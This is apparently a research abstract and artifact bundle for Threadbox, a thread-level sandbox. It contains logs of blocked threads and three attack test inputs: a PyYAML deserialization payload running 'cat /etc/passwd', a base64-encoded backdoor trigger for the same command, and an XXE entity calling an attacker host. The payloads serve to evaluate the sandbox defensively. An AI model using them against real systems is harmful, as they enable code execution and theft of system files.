Threadbox: Sandboxing for Modular Security

There are many sandboxing mechanisms provided by operating systems to limit what resources applications can access, however, sometimes the use of these mechanisms requires developers to refactor their code to fit the sandboxing model. In this work, we investigate what makes existing sandboxing mechanisms challenging to apply to certain types of applications, and propose Threadbox, a sandboxing mechanism that enables having modular and independent sandboxes, and can be applied to threads and sandbox specific functions. We present case studies to illustrate the applicability of the idea and discuss its limitations.

==> code/awk_script.txt <==
awk -F'(' '{print $1}' pdfreader_strace.out | sort | uniq > pdfreader.sys

==> code/backdoor_command.txt <==
backdoor_Y2F0IC9ldGMvcGFzc3dk

==> code/backdoor_logs.txt <==
proc promise: denied for Thread: sendfile
kiling a process pid 5224 tid 5228


==> code/flask_learning_logs.txt <==
rpath promise: allowed for Thread: Login module
net promise: allowed for Thread: Login module


==> code/kernel_log.txt <==
Violated promise: net for Thread: read_file
Thread read_file has been killed
Violated promise: rpath for Thread: check_port


==> code/xeelogs.txt <==
net promise: denied for Thread: PDF parser thread
kiling a process pid 6698 tid 6731


==> code/xxe.txt <==
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.net" > ]

==> code/yaml_exp_output.txt <==
proc promise: denied for Thread: Register module
kiling a process pid 2953 tid 2963


==> code/yaml_exploit.txt <==
!!python/object/apply:os.system ['cat /etc/passwd']
